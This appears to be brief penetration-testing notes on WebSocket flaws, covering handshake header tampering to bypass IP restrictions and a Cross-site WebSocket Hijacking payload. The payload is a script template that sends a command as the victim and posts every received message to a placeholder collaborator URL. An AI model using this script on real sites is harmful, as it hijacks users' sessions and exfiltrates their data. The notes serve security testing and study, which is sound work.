Common vulnerabilities
Manipulating Websocket Handshake
clone for a connected websocket or reconnect for a disconnected websocket
connect to test out the configured handshakeX-Forwarded-For or any custom headers
X-Forwarded-For can sometimes bypass IP restrictionsCross-site WebSocket Hijacking
<script>
var ws = new WebSocket('wss://{websocket_rl}');
ws.onopen = function() {
ws.send("{command_to_send_as_user}");
};
ws.onmessage = function(event) {
fetch('{collaborator_url}', {method: 'POST', mode: 'no-cors', body: event.data});
};
</script>